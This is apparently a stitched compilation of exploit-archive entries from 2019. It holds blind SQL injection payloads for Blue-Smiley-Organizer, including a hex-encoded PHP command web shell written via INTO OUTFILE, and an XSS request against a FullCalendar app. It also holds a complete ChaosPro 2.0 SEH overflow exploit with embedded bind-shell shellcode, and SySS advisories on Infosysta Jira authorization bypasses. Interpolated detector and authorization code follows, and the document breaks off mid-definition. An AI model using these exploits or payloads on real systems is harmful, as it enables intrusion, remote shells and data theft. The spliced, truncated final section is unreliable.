
delpino73 Blue-Smiley-Organizer 1.32 SQL Injection


delpino73 Blue-Smiley-Organizer version 1.32 suffers from a remote SQL injection vulnerability.


MD5 | b8736597eeedb126c519a4e77c7a2d16

Exploit Title: delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection
Date: 2019-10-28
Exploit Author: Cakes
Vendor Homepage: https://github.com/delpino73/Blue-Smiley-Organizer
Software Link: https://github.com/delpino73/Blue-Smiley-Organizer.git
Version: 1.32
Tested on: CentOS7
CVE : N/A

# PoC: Multiple SQL Injection vulnerabilities
# Nice and easy SQL Injection

Parameter: datetime (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: datetime=2019-10-27 10:53:00' AND 6315=(SELECT (CASE WHEN (6315=6315) THEN 6315 ELSE (SELECT 3012 UNION SELECT 2464) END))-- sQtq&title=tester&category_id=1&new_category=&text=test2&public=1&save=Save Note
Vector: AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))[GENERIC_SQL_COMMENT]

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: datetime=2019-10-27 10:53:00' AND (SELECT 7239 FROM (SELECT(SLEEP(5)))wrOx)-- cDKQ&title=tester&category_id=1&new_category=&text=test2&public=1&save=Save Note
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])


# Pop a PHP CMD Shell

' LIMIT 0,1 INTO OUTFILE '/Path/To/Folder/upload/exec.php' LINES TERMINATED BY 0x3c3f7068702024636d64203d207368656c6c5f6578656328245f4745545b27636d64275d293b206563686f2024636d643b203f3e-- -


waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 Cross Site Scripting


waldronmatt FullCalendar-BS4-PHP-MySQL-JSON version 1.21 suffers from a cross site scripting vulnerability.


MD5 | d7df4d782697a7e80efc7fa21b17f0b4

Exploit Title: waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'description' Cross-Site Scripting
Date: 2019-10-28
Exploit Author: Cakes
Vendor Homepage: waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON
Software Link: https://github.com/waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON.git
Version: 1.21
Tested on: CentOS7
CVE : N/A

# Description:
# Cross-Site scripting vulnerability in the description field. This XSS completely breaks the web application.

#POC
POST /addEvent.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.20/calendar03/
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
Cookie: PHPSESSID=t41kk4huqaluhcfghvqqvucl56
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

title=%3Cscript%3Ealert%28%22TEST-Title%22%29%3B%3C%2Fscript%3E&description=%3Cscript%3Ealert%28%22TEST-Description%22%29%3B%3C%2Fscript%3E&color=%230071c5&start=2019-01-23+00%3A00%3A00&end=2019-01-24+00%3A00%3A00
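As an added example (not part of either entry above, and not the projects' code): a small triage routine that URL-decodes a captured form body and flags the payload shapes shown in the two entries, the sqlmap-style boolean-based and time-based blind injection and INTO OUTFILE in `datetime`, and the `<script>` injection in `title`/`description`. The sample bodies are constructed from the advisories' payloads; the signature names are my own.

```python
import re
from urllib.parse import parse_qs

# Signatures derived from the payload vectors listed above (sqlmap-style
# boolean-based and time-based blind injection, and INTO OUTFILE) plus the
# two most common reflected-XSS shapes.
SQLI_PATTERNS = {
    "boolean-blind-case": re.compile(
        r"\bAND\s+\d+\s*=\s*\(\s*SELECT\s*\(\s*CASE\s+WHEN\b", re.I),
    "time-blind-sleep": re.compile(r"\bSELECT\s*\(\s*SLEEP\s*\(", re.I),
    "into-outfile": re.compile(r"\bINTO\s+(?:OUT|DUMP)FILE\b", re.I),
}
XSS_PATTERNS = {
    "script-tag": re.compile(r"<\s*script\b", re.I),
    "event-handler": re.compile(
        r"\bon(?:load|error|click|focus|blur|mouse\w+|key\w+)\s*=", re.I),
}


def triage_form_body(body):
    """Decode one application/x-www-form-urlencoded body and return
    {parameter: [finding, ...]} for every parameter matching a signature.
    parse_qs splits each pair on the first '=' only, so an '=' inside a
    payload (6315=6315) stays in the value."""
    findings = {}
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            hits = ["sqli:" + n for n, rx in SQLI_PATTERNS.items() if rx.search(value)]
            hits += ["xss:" + n for n, rx in XSS_PATTERNS.items() if rx.search(value)]
            if hits:
                findings.setdefault(param, []).extend(hits)
    return findings


# Constructed sample bodies: the first three follow the advisories' payloads,
# the fourth is an ordinary note submission that must not be flagged.
BOOLEAN_BLIND_BODY = (
    "datetime=2019-10-27 10:53:00' AND 6315=(SELECT (CASE WHEN (6315=6315) "
    "THEN 6315 ELSE (SELECT 3012 UNION SELECT 2464) END))-- sQtq"
    "&title=tester&category_id=1&new_category=&text=test2&public=1&save=Save Note")
TIME_BLIND_BODY = (
    "datetime=2019-10-27 10:53:00' AND (SELECT 7239 FROM (SELECT(SLEEP(5)))wrOx)-- cDKQ"
    "&title=tester&category_id=1&new_category=&text=test2&public=1&save=Save Note")
XSS_BODY = (
    "title=%3Cscript%3Ealert%28%22TEST-Title%22%29%3B%3C%2Fscript%3E"
    "&description=%3Cscript%3Ealert%28%22TEST-Description%22%29%3B%3C%2Fscript%3E"
    "&color=%230071c5&start=2019-01-23+00%3A00%3A00&end=2019-01-24+00%3A00%3A00")
BENIGN_BODY = ("datetime=2019-10-27 10:53:00&title=Weekly sync"
               "&text=Discuss on Monday&public=1&save=Save Note")

if __name__ == "__main__":
    for label, body in [("boolean-blind", BOOLEAN_BLIND_BODY),
                        ("time-blind", TIME_BLIND_BODY),
                        ("xss", XSS_BODY), ("benign", BENIGN_BODY)]:
        print(label, triage_form_body(body))
```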

ChaosPro 2.0 Buffer Overflow


ChaosPro version 2.0 SEH buffer overflow exploit.


MD5 | 677f3fb6a854745d4e1df076244fcb19

# Exploit Title: ChaosPro 2.0 - Buffer Overflow (SEH)
# Date: 2019-10-27
# Exploit Author: Chase Hatch (SYANiDE)
# Vendor Homepage: http://www.chaospro.de/
# Software link: http://www.chaospro.de/cpro20.zip
# Version: 2.0
# Tested on: Windows XP Pro OEM

#!/usr/bin/env python2
import os, sys


# sploit = "A"* 5000 ## Crash! 41414141 in SEH! via ProfilePath or PicturePath. Windows XP OEM
# `locate pattern_create.rb | head -n 1` 5000 # 326d4431
# `locate pattern_offset.rb | head -n 1` 326d4431 5000 # 2705
# sploit = "A" * (2705 - 4 - 126) # 2575
# sploit = (pattern_create) # `locate pattern_create.rb|head -n 1` 2575 # 0012F51C dump is 61354161, or 61413561 in LE
# `locate pattern_offset.rb|head -n 1` 61413561 2575
# 16


################ Second stage ####################
sploit = "A"*16
# msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh
#, BufferRegister=ESP -b "\x00" -e x86/alpha_mixed -i 1 -f c
sploit += (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x6b\x58\x6e\x62\x77\x70"
"\x75\x50\x57\x70\x71\x70\x6c\x49\x68\x65\x44\x71\x4b\x70\x50"
"\x64\x4e\x6b\x52\x70\x36\x50\x4c\x4b\x36\x32\x66\x6c\x4e\x6b"
"\x62\x72\x54\x54\x6e\x6b\x72\x52\x34\x68\x54\x4f\x6d\x67\x50"
"\x4a\x31\x36\x30\x31\x6b\x4f\x6c\x6c\x55\x6c\x71\x71\x31\x6c"
"\x53\x32\x76\x4c\x67\x50\x7a\x61\x48\x4f\x56\x6d\x33\x31\x6b"
"\x77\x58\x62\x4a\x52\x61\x42\x56\x37\x6e\x6b\x52\x72\x52\x30"
"\x4c\x4b\x71\x5a\x37\x4c\x4e\x6b\x32\x6c\x52\x31\x50\x78\x4b"
"\x53\x37\x38\x75\x51\x68\x51\x62\x71\x4c\x4b\x46\x39\x45\x70"
"\x53\x31\x68\x53\x4c\x4b\x51\x59\x64\x58\x4b\x53\x64\x7a\x63"
"\x79\x6c\x4b\x34\x74\x4c\x4b\x33\x31\x6b\x66\x36\x51\x49\x6f"
"\x6c\x6c\x7a\x61\x58\x4f\x64\x4d\x67\x71\x68\x47\x70\x38\x4b"
"\x50\x64\x35\x68\x76\x54\x43\x43\x4d\x58\x78\x67\x4b\x33\x4d"
"\x56\x44\x72\x55\x79\x74\x43\x68\x4c\x4b\x50\x58\x46\x44\x77"
"\x71\x58\x53\x65\x36\x4e\x6b\x44\x4c\x62\x6b\x4c\x4b\x32\x78"
"\x45\x4c\x33\x31\x6a\x73\x6c\x4b\x53\x34\x6e\x6b\x46\x61\x7a"
"\x70\x4b\x39\x72\x64\x57\x54\x61\x34\x51\x4b\x51\x4b\x35\x31"
"\x31\x49\x71\x4a\x32\x71\x69\x6f\x69\x70\x73\x6f\x61\x4f\x52"
"\x7a\x4c\x4b\x65\x42\x4a\x4b\x6e\x6d\x53\x6d\x65\x38\x75\x63"
"\x35\x62\x67\x70\x45\x50\x51\x78\x70\x77\x71\x63\x55\x62\x43"
"\x6f\x31\x44\x45\x38\x52\x6c\x43\x47\x65\x76\x43\x37\x49\x6f"
"\x58\x55\x68\x38\x6c\x50\x43\x31\x67\x70\x73\x30\x55\x79\x6f"
"\x34\x53\x64\x66\x30\x61\x78\x37\x59\x6b\x30\x52\x4b\x73\x30"
"\x49\x6f\x39\x45\x52\x4a\x53\x38\x51\x49\x46\x30\x39\x72\x49"
"\x6d\x67\x30\x42\x70\x71\x50\x66\x30\x63\x58\x48\x6a\x44\x4f"
"\x39\x4f\x59\x70\x4b\x4f\x4b\x65\x4e\x77\x51\x78\x37\x72\x73"
"\x30\x47\x61\x43\x6c\x6c\x49\x38\x66\x72\x4a\x76\x70\x52\x76"
"\x42\x77\x33\x58\x4b\x72\x69\x4b\x47\x47\x35\x37\x69\x6f\x5a"
"\x75\x63\x67\x31\x78\x6f\x47\x59\x79\x50\x38\x79\x6f\x59\x6f"
"\x6e\x35\x71\x47\x42\x48\x50\x74\x68\x6c\x47\x4b\x39\x71\x6b"
"\x4f\x49\x45\x73\x67\x4e\x77\x31\x78\x50\x75\x72\x4e\x62\x6d"
"\x61\x71\x49\x6f\x58\x55\x65\x38\x51\x73\x70\x6d\x33\x54\x47"
"\x70\x6b\x39\x7a\x43\x73\x67\x72\x77\x53\x67\x45\x61\x6a\x56"
"\x30\x6a\x32\x32\x46\x39\x51\x46\x6d\x32\x4b\x4d\x62\x46\x58"
"\x47\x61\x54\x47\x54\x57\x4c\x36\x61\x53\x31\x6c\x4d\x50\x44"
"\x44\x64\x56\x70\x69\x56\x57\x70\x53\x74\x71\x44\x62\x70\x42"
"\x76\x51\x46\x76\x36\x77\x36\x56\x36\x42\x6e\x36\x36\x50\x56"
"\x30\x53\x42\x76\x42\x48\x42\x59\x58\x4c\x37\x4f\x4b\x36\x69"
"\x6f\x59\x45\x4b\x39\x6b\x50\x42\x6e\x62\x76\x47\x36\x59\x6f"
"\x54\x70\x62\x48\x56\x68\x6d\x57\x65\x4d\x31\x70\x59\x6f\x7a"
"\x75\x6d\x6b\x49\x6e\x66\x6e\x75\x62\x39\x7a\x71\x78\x6e\x46"
"\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55\x65\x6c\x57\x76\x31"
"\x6c\x47\x7a\x4d\x50\x79\x6b\x59\x70\x52\x55\x63\x35\x6f\x4b"
"\x31\x57\x37\x63\x44\x32\x42\x4f\x70\x6a\x35\x50\x51\x43\x69"
"\x6f\x39\x45\x41\x41"
) # 710 bytes
sploit += "A" * (2575 - 16 - 710)


################ First stage ####################

# ESP: 0012E75C
# ESP target: 0012FF98
## Need to align to four-byte and 16-byte boundaries:
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /16" |bc
# 282.0000
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /4" |bc
# 1551.0000
# echo "ibase=16; obase=10; 0012FF98 - 0012E75C" |bc
# 183C
# 0012FF32 54 PUSH ESP
# 0012FF33 58 POP EAX
# 0012FF34 66:05 3C18 ADD AX,183C
# 0012FF38 50 PUSH EAX
# 0012FF39 5C POP ESP
sploit += "\x54\x58\x66\x05\x3c\x18\x50\x5c" # 8


# target instruction to push onto stack at new ESP: FFE4 JMP ESP # 4141E4FF
# ./calc_target2.py 4141E4FF 0 7f7f017f 0101017f 3e3e1803
# 0:25 28 28 28 28 and eax,0x28282828
# 5:25 47 47 47 47 and eax,0x47474747
# a:2d 7f 01 7f 7f sub eax,0x7f7f017f
# f:2d 7f 01 01 01 sub eax,0x101017f
# 14:2d 03 18 3e 3e sub eax,0x3e3e1803
# 19:50 push eax
sploit += (
"\x25\x28\x28\x28\x28"
"\x25\x47\x47\x47\x47"
"\x2d\x7f\x01\x7f\x7f"
"\x2d\x7f\x01\x01\x01"
"\x2d\x03\x18\x3e\x3e"
"\x50"
) # 26 bytes

## Realign new ESP with beginning of overflow buffer:
## New ESP should be four-byte and 16-byte aligned:
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 16" |bc
# 122.0000
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 4" |bc
# 671.0000
# echo "ibase=16; obase=10;0012FF98 - 0012F51C" |bc
# A7C
## Need to adjust ESP down the stack past the JMP ESP, so push/pop ahead of the JMP ESP we're trying to sled into (keep the sled clean)
# 0012FF54 44 INC ESP
# 0012FF55 44 INC ESP
# 0012FF56 44 INC ESP
# 0012FF57 44 INC ESP
# 0012FF58 44 INC ESP
# 0012FF59 44 INC ESP
# 0012FF5A 44 INC ESP
# 0012FF5B 44 INC ESP
sploit += "\x44\x44\x44\x44\x44\x44\x44\x44" # 8

## Going to have to carve out the address 0012F51C
# ./calc_target2.py 0012F51C 0 7f7f017f 61010101 1f6d0864
# 0:25 02 02 02 02 and eax,0x2020202
# 5:25 51 51 51 51 and eax,0x51515151
# a:2d 7f 01 7f 7f sub eax,0x7f7f017f
# f:2d 01 01 01 61 sub eax,0x61010101
# 14:2d 64 08 6d 1f sub eax,0x1f6d0864
# 19:50 push eax
sploit +=(
"\x25\x02\x02\x02\x02"
"\x25\x51\x51\x51\x51"
"\x2d\x7f\x01\x7f\x7f"
"\x2d\x01\x01\x01\x61"
"\x2d\x64\x08\x6d\x1f"
"\x50"
) # 26 bytes

## Finally, set ESP for the alpha_mixed BufferRegister + JMP ESP
# 5C POP ESP
sploit += "\x5c" # 1

sploit += "A" * (126 - 8 - 26 - 8 - 26 - 1)

################ RET from SEH: JMP SHORT - 126 ####################

sploit += "\xeb\x80" + "\x41\x41" # 4
# 00401B44 |. 5F POP EDI
# 00401B45 |> 5E POP ESI
# 00401B46 \. C3 RETN
sploit += "\x44\x1b\x40\x00"


################ build the config ####################
## Running from just outside base directory of ChaosPro:

def ret_cfg(inp):
    # do it live in PicturePath
    cfg = """PicturePath %s""" % inp
    with open("chaospro\\ChaosPro.cfg", 'w') as F:
        F.write(cfg)

ret_cfg(sploit)

Infosysta Jira 1.6.13_J8 Push Notification Authentication Bypass


Infosysta Jira version 1.6.13_J8 suffers from an authentication bypass vulnerability that allows you to see push notifications for a given user.


MD5 | e978dd491985424573c50baaaec4bc19

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2019-041
Product: In-App & Desktop Notification for Jira
Manufacturer: Infosysta
Affected Version(s): 1.6.13_J8
Tested Version(s): 1.6.13_J8
Vulnerability Type: Authentication/Authorization Bypass
Risk Level: High
Solution Status: Closed
Manufacturer Notification: 2019-09-24
Solution Date: 2019-10-01
Public Disclosure: 2019-10-23
CVE Reference: CVE-2019-16906
Author of Advisory:
Erik Steltzner, SySS GmbH
Fabian Krone, SySS GmbH
Sascha Heider, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

In-App & Desktop Notification for Jira is a plug-in that displays Jira's email
notifications directly within the application.

The manufacturer describes the product as follows (see [1]):

"In-app & Desktop Notifications for Jira app allows you to get all of Jira's
email notifications in front of you. Now you won't have to search through all
your emails to check for a specific event in Jira, but all what you need to do
is to check the notification section in Jira and see all events that happened
in Jira and are related to you.
You will also receive instant Desktop notifications as well as you will be able
to add comments to the tickets directly from the notification."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Given a Jira user name, that user's notifications can be read without authentication or authorization.
A notification read this way is then no longer displayed to the legitimate user.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using the following path it is possible to see notifications for a specific user:
/plugins/servlet/nfj/PushNotification?username=<userName>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Before delivering a reply, it should be checked whether a
request has the necessary authorization.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-09-10: Vulnerability discovered
2019-09-24: Vulnerability reported to manufacturer
2019-10-01: Patch released by manufacturer
2019-10-23: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for In-App & Desktop Notification for Jira
https://marketplace.atlassian.com/apps/1217434/in-app-desktop-notifications-for-jira
[2] SySS Security Advisory SYSS-2019-041
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-041.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Erik Steltzner, Fabian Krone
and Sascha Heider of SySS GmbH.

E-Mail: erik.steltzner@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Erik_Steltzner.asc
Key ID: 0x4C7979CE53163268
Key Fingerprint: 6538 8216 555B FBE7 1E01 7FBD 4C79 79CE 5316 3268

E-Mail: fabian.krone@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Fabian_Krone.asc
Key ID: 0xBFDF30ABD10EA0F4
Key Fingerprint: 0ADE D2AA AE27 7DDA A8F0 C051 BFDF 30AB D10E A0F4

E-Mail: sascha.heider@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Sascha_Heider.asc
Key ID: 0x06C4F8D7FCE9AF94
Key Fingerprint: F99E 89B8 EF77 C34F 6F9F 0E19 06C4 F8D7 FCE9 AF94

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----


Infosysta Jira 1.6.13_J8 Project List Authentication Bypass


Infosysta Jira version 1.6.13_J8 suffers from an authentication bypass vulnerability that allows you to see project lists.


MD5 | 58b9e2b857edf27d3b79eed3151ffa98

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2019-042
Product: In-App & Desktop Notification for Jira
Manufacturer: Infosysta
Affected Version(s): 1.6.13_J8
Tested Version(s): 1.6.13_J8
Vulnerability Type: Authentication/Authorization Bypass
Risk Level: Medium
Solution Status: Closed
Manufacturer Notification: 2019-09-24
Solution Date: 2019-10-01
Public Disclosure: 2019-10-23
CVE Reference: CVE-2019-16908, CVE-2019-16909
Author of Advisory:
Erik Steltzner, SySS GmbH
Fabian Krone, SySS GmbH
Sascha Heider, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

In-App & Desktop Notification for Jira is a plug-in that displays Jira's email
notifications directly within the application.

The manufacturer describes the product as follows (see [1]):

"In-app & Desktop Notifications for Jira app allows you to get all of Jira's
email notifications in front of you. Now you won't have to search through all
your emails to check for a specific event in Jira, but all what you need to do
is to check the notification section in Jira and see all events that happened
in Jira and are related to you.
You will also receive instant Desktop notifications as well as you will be able
to add comments to the tickets directly from the notification."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

It is possible to view all projects within Jira without authentication/authorization.
Furthermore, it is possible to view all projects within Jira as a logged-in user even
though no permission was granted to these projects.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using the following path it is possible to see all existing projects unauthenticated:
/plugins/servlet/nfj/ProjectFilter?searchQuery=

To see all projects authenticated, use the following path as logged in user:
/plugins/servlet/nfj/NotificationSettings

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Before delivering a reply, it should be checked whether a
request has the necessary authorization.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-09-10: Vulnerability discovered
2019-09-24: Vulnerability reported to manufacturer
2019-10-01: Patch released by manufacturer
2019-10-23: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for In-App & Desktop Notification for Jira
https://marketplace.atlassian.com/apps/1217434/in-app-desktop-notifications-for-jira
[2] SySS Security Advisory SYSS-2019-042
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-042.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Erik Steltzner, Fabian Krone
and Sascha Heider of SySS GmbH.

E-Mail: erik.steltzner@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Erik_Steltzner.asc
Key ID: 0x4C7979CE53163268
Key Fingerprint: 6538 8216 555B FBE7 1E01 7FBD 4C79 79CE 5316 3268

E-Mail: fabian.krone@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Fabian_Krone.asc
Key ID: 0xBFDF30ABD10EA0F4
Key Fingerprint: 0ADE D2AA AE27 7DDA A8F0 C051 BFDF 30AB D10E A0F4

E-Mail: sascha.heider@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Sascha_Heider.asc
Key ID: 0x06C4F8D7FCE9AF94
Key Fingerprint: F99E 89B8 EF77 C34F 6F9F 0E19 06C4 F8D7 FCE9 AF94

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----

Infosysta Jira 1.6.13_J8 User Name Disclosure


Infosysta Jira version 1.6.13_J8 suffers from a user name disclosure vulnerability.


MD5 | d8eaa0fd58944cde06c22cc0a580a83a

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2019-043
Product: In-App & Desktop Notification for Jira
Manufacturer: Infosysta
Affected Version(s): 1.6.13_J8
Tested Version(s): 1.6.13_J8
Vulnerability Type: Authentication/Authorization Bypass
Risk Level: Medium
Solution Status: Closed
Manufacturer Notification: 2019-09-24
Solution Date: 2019-10-01
Public Disclosure: 2019-10-23
CVE Reference: CVE-2019-16907
Author of Advisory:
Erik Steltzner, SySS GmbH
Fabian Krone, SySS GmbH
Sascha Heider, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

In-App & Desktop Notification for Jira is a plug-in that displays Jira's email
notifications directly within the application.

The manufacturer describes the product as follows (see [1]):

"In-app & Desktop Notifications for Jira app allows you to get all of Jira's
email notifications in front of you. Now you won't have to search through all
your emails to check for a specific event in Jira, but all what you need to do
is to check the notification section in Jira and see all events that happened
in Jira and are related to you.
You will also receive instant Desktop notifications as well as you will be able
to add comments to the tickets directly from the notification."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

It is possible to read out all user names within Jira without authentication/authorization.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using the following path it is possible to list all existing user names:
/plugins/servlet/nfj/UserFilter?searchQuery=@

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Before delivering a reply, it should be checked whether a
request has the necessary authorization.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-09-10: Vulnerability discovered
2019-09-24: Vulnerability reported to manufacturer
2019-10-01: Patch released by manufacturer
2019-10-23: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for In-App & Desktop Notification for Jira
https://marketplace.atlassian.com/apps/1217434/in-app-desktop-notifications-for-jira
[2] SySS Security Advisory SYSS-2019-043
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-043.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Erik Steltzner, Fabian Krone and Sascha Heider
of SySS GmbH.

E-Mail: erik.steltzner@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Erik_Steltzner.asc
Key ID: 0x4C7979CE53163268
Key Fingerprint: 6538 8216 555B FBE7 1E01 7FBD 4C79 79CE 5316 3268

E-Mail: fabian.krone@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Fabian_Krone.asc
Key ID: 0xBFDF30ABD10EA0F4
Key Fingerprint: 0ADE D2AA AE27 7DDA A8F0 C051 BFDF 30AB D10E A0F4

E-Mail: sascha.heider@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Sascha_Heider.asc
Key ID: 0x06C4F8D7FCE9AF94
Key Fingerprint: F99E 89B8 EF77 C34F 6F9F 0E19 06C4 F8D7 FCE9 AF94

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

-----END PGP SIGNATURE-----
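The three SySS advisories above (SYSS-2019-041, -042 and -043) give the same one-line solution: check whether the request is authorized before delivering a reply. As an added illustration, not Infosysta's code, the following sketch models the three servlet paths as plain Python handlers and puts that check in front of them; `Request`, the in-memory NOTIFICATIONS/PROJECTS/USERS tables and the ADMINS role are constructed stand-ins.

```python
from dataclasses import dataclass, field
from functools import wraps
from typing import Optional


@dataclass
class Request:
    path: str
    params: dict = field(default_factory=dict)
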